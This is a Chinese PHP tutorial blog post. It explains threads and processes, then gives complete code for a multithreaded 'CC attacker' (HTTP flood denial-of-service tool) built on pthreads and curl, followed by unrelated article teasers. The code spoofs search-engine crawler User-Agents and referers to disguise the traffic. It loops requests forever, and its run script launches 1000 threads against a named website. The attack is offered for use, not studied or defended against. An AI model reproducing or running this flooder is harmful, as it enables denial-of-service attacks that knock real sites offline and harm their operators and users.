百度360必应搜狗淘宝本站头条
当前位置:网站首页 > 技术文章 > 正文

PHP进阶教程-PHP还能玩多线程?看我怎么用多线程实现CC攻击器。

zhezhongyun 2025-01-05 21:15 31 浏览

线程

线程与进程有很多类似的地方,但是也有部分不一样。在讲进程的时候我们给大家看过一张图。

从图中可以看出来线程是在进程内创建的,也就说多个线程共享一个进程内的资源;包括内存、地址空间、文件描述符等等。使用多线程是无序执行的,线程的调度和进程一样,由操作系统来调度,因此什么时候执行我们并不知道。有一句话可以概括:线程就是更轻量的进程。

线程

  1. 一个进程至少有一个线程
  2. 同一个进程内的多个线程共享同一份资源
  3. 文件描述符表
  4. 信号处理方式
  5. 当前工作目录
  6. 内存地址空间

每个线程有自己的独立栈,也就是线程内部的变量其他线程拿不到,除非是在进程内的全局变量。

既然有了多进程为什么我们还需要多线程?进程在遇到IO会阻塞,后面的代码无法执行,这时候CPU处于空跑状态,为了充分的利用CPU,操作系统会自动把遇到IO阻塞的进程挂起,切换到其他进程。

进程上下文

线程上下文

操作系统会给每一个进程分配给可用的时间片,就是每个进程每次运行多久,例如:CPU给每个进程分配了10ms的时间,如果一个进程执行到3ms的时候发生了IO阻塞怎么办呢?在单线程的情况下,会被切换到另一个进程,当前进程会被挂起。而多线程呢,是尽可能的利用完CPU给这个进程分配的时间片。

举个“栗子”,微信我们大家都在用,微信很显然就是一个多线程程序,为什么这样说呢?我们在跟别人视频的时候同时还可以跟其他人聊天,还可以使用输入法输入文字,选择表情,如果只有一个线程,那么我们在跟别人视频的时候这个线程就会阻塞,我们看到微信的界面就会卡死。

一个线程遇到阻塞的时候,会在同一个进程内的其他空闲线程切换,这样的切换只要消耗线程栈开销,因此很多时候我们都说线程是轻量级的进程。

因此需要把一个进程里面的任务再次分割成任务片,类似CPU分出来的时间片一样,分成多少份就开多少个线程。

我们可以通过多线程来实现一个CC攻击器。

实战:CC攻击器

CC攻击就是一种制造大量访问导致对方服务器资源耗尽无法提供服务的一种手段,这里用简单的方式实现,采用多线程+线程池+curl实现一个简单的cc攻击。


扩展下载地址:

https://github.com/krakjoe/pthreads.git

cc.php

<?php
class CC extends Thread{
    // 要攻击的url
    private $url;
    // 要攻击的域名
    private $host;
    // user-agent
    private $userAgent = [
        'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36 MicroMessenger/5.2.380',
        'Mozilla/5.0 (compatible; Baiduspider/2.0;+http://www.baidu.com/search/spider.html)',
        'Mozilla/5.0 (Linux;u;Android 4.2.2;zh-cn;) AppleWebKit/534.46 (KHTML,likeGecko) Version/5.1 Mobile Safari/10600.6.3 (compatible; Baiduspider/2.0;+http://www.baidu.com/search/spider.html)',
        'Mozilla/5.0 (compatible;Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)',
        'Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 likeMac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143Safari/601.1 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)',
        'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',
        'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
        'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0); 360Spider'
    ];

    // 模拟请求来源
    private $referers = array(
        'https://www.baidu.com?k=',
        'https://www.sogou.com?keyword=',
        'https://www.so.com?keyword=',
        'https://www.google.com?k=',
        'https://m.baidu.com?keyword=',
        'https://m.sogou.com?keyword=',
        'https://m.so.com?key='
    );

    public function __construct($url)
    {
        $this->url = $url;
        $this->parserUrl();
    }

    /**
     * 解析host
     */
    private function parserUrl()
    {
        $parser = parse_url($this->url);
        $this->host = $parser['host'];
    }

    /**
     * 获取头信息
     * @return void
     */
    private function getHeader(){
        $referer = $this->referers[mt_rand(0,count($this->referers))];
        $userAgent = $this->userAgent[mt_rand(0,count($this->userAgent))];
        return [
            'Host'=>$this->host,
            'Referer'=>$referer,
            'User-Agent'=>$userAgent,
            'Accept'=>'text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8',
            'Accept-Language'=>' en-US,en;q=0.5',
            'Accept-Charset'=>'iso-8859-1',
            'Accept-Encoding'=>'gzip',
            'Connection'=>'Keep-Alive'
        ];
    }
    

    /**
     * 实现访问
     */
    public function request()
    {
        $header = $this->getHeader();
        $curl = curl_init();
        // CURL头信息设置
        curl_setopt($curl, CURLOPT_HTTPHEADER, $header);
        curl_setopt($curl, CURLOPT_URL, $this->url);
        curl_setopt($curl, CURLOPT_TIMEOUT, 30);
        curl_setopt($curl, CURLOPT_HEADER, false);
        curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
        $res = curl_exec($curl);
        var_dump($res);
        curl_close($curl);
    }

    public function run()
    {
        while(true){
            $this->request();
            sleep(0.3);
        }
    }
}

threadPool.php

<?php
class ThreadPool{
    public $pool = array();
    private $url;
	public function __construct($url,$count) {
        $this->url = $url;
        $this->count = $count;
	}
	public function push(){
		if(count($this->pool) < $this->count){
			$this->pool[] = new CC($this->url);
			return true;
		}else{
			return false;
		}
	}
	public function start(){
		foreach ( $this->pool as $id => $worker){
			$this->pool[$id]->start();
		}
	}
	public function join(){
		foreach ( $this->pool as $id => $worker){
               $this->pool[$id]->join();
		}
	}
}

run.php

<?php
require 'cc.php';
require 'threadPool.php';
$count = 1000;
$pool = new ThreadPool('http://www.vxwei.com/index.php',$count);
for($i=0;$i<$count;$i++){
    $pool->push();
}
$pool->start();
$pool->join();

如果喜欢我的文章请转发朋友圈点关注,一心只做原创文章。

相关推荐

激光手术矫正视力对眼睛到底有没有伤害?

因为大家询问到很多关于“基质不能完全愈合”的问题,有必要在这里再详细解释一下。谢谢@珍惜年少时光提出的疑问:因为手头刚好在看组织学,其中提到:”角膜基质约占角膜的全厚度的90%,主要成分是胶原板层,...

OneCode核心概念解析——View(视图)

什么是视图?在前面的章节中介绍过,Page相关的概念,Page是用户交互的入口,具有Url唯一性。但Page还只是一个抽象的容器,而View则是一个具备了具体业务能力的特殊的Page,它可以是一个...

精品博文图文详解Xilinx ISE14.7 安装教程

在软件安装之前,得准备好软件安装包,可从Xilinx官网上下载:http://china.xilinx.com/support/download/index.html/content/xilinx/z...

卡片项目管理(Web)(卡片设计的流程)

简洁的HTML文档卡片管理,简单框架个人本地离线使用。将个人工具类的文档整理使用。优化方向:添加图片、瀑布式布局、颜色修改、毛玻璃效果等。<!DOCTYPEhtml><html...

GolangWeb框架Iris项目实战-JWT和中间件(Middleware)的使用EP07

前文再续,上一回我们完成了用户的登录逻辑,将之前用户管理模块中添加的用户账号进行账号和密码的校验,过程中使用图形验证码强制进行人机交互,防止账号的密码被暴力破解。本回我们需要为登录成功的用户生成Tok...

sitemap 网站地图是什么格式?有什么好处?

sitemap网站地图方便搜索引擎发现和爬取网页站点地图是一种xml文件,或者是txt,是将网站的所有网址列在这个文件中,为了方便搜索引擎发现并收录的。sitemap网站地图分两种:用于用户导...

如何在HarmonyOS NEXT中处理页面间的数据传递?

大家好,前两天的Mate70的发布,让人热血沸腾啊,不想错过,自学的小伙伴一起啊,今天分享的学习笔记是关于页面间数据伟递的问题,在HarmonyOSNEXT5.0中,页面间的数据传递可以有很多种...

从 Element UI 源码的构建流程来看前端 UI 库设计

作者:前端森林转发链接:https://mp.weixin.qq.com/s/ziDMLDJcvx07aM6xoEyWHQ引言由于业务需要,近期团队要搞一套自己的UI组件库,框架方面还是Vue。而业界...

jq+ajax+bootstrap改了一个动态分页的表格

最近在维护一个很古老的项目,里面是用jq的dataTable方法实现一个分页的表格,不过这些表格的分页是本地分页。现在想要的是点击分页去请求数据。经过多次的修改,以失败告终。分页的不准确,还会有这个错...

学习ES6- 入门Vue(大量源代码及笔记,带你起飞)

ES6学习网站:https://es6.ruanyifeng.com/箭头函数普通函数//普通函数this指向调用时所在的对象(可变)letfn=functionfn(a,b){...

青锋微服务架构之-Ant Design Pro 基本配置

青锋(msxy)-Gitee.com1、更换AntDesignPro的logo和名称需要修改文件所在位置:/config/defaultSetting.jsconstproSett...

大数据调度服务监控平台(大数据调度服务监控平台官网)

简介SmartKettle是针对上述企业的痛点,对kettle的使用做了一些包装、优化,使其在web端也能具备基础的kettle作业、转换的配置、调度、监控,能在很大一定程度上协助企业完成不同...

Flask博客实战 - 实现博客首页视图及样式

本套教程是一个Flask实战类教程,html/css/javascript等相关技术栈不会过多的去详细解释,那么就需要各位初学者尽可能的先去掌握这些基础知识,当然本套教程不需要你对其非常精通,但最起码...

Web自动化测试:模拟鼠标操作(ActionChains)

在日常的测试中,经常会遇到需要鼠标去操作的一些事情,比如说悬浮菜单、拖动验证码等,这一节我们来学习如何使用webdriver模拟鼠标的操作首页模拟鼠标的操作要首先引入ActionChains的包fro...

DCS F-16C 中文指南 16.9ILS仪表降落系统教程

10–ILS教程我们的ILS(仪表着陆进近)将到达Batumi巴统机场。ILS频率:110.30跑道航向:120磁航向/126真航向无线电塔频率:131.0001.设置雷达高度表开关打开(前)并...